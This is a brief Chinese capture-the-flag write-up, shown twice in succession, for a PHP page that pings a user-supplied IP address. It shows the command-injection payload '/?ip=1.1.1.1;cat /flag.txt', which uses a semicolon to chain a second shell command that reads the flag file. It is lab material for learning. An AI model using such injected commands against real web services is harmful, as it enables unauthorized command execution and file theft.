打开环境发现
明显php代码,代码意义为ping一次地址
在后面加上
/?ip=1.1.1.1
发现可以执行,那就可以使用;来进行注入
;是linux命令连续执行
在ip基础上加上
/?ip=1.1.1.1;cat /flag.txt
得到flag
flag{123124}
打开环境发现
明显php代码,代码意义为ping一次地址
在后面加上
/?ip=1.1.1.1
发现可以执行,那就可以使用;来进行注入
;是linux命令连续执行
在ip基础上加上
/?ip=1.1.1.1;cat /flag.txt
得到flag
flag{123124}
暂无评论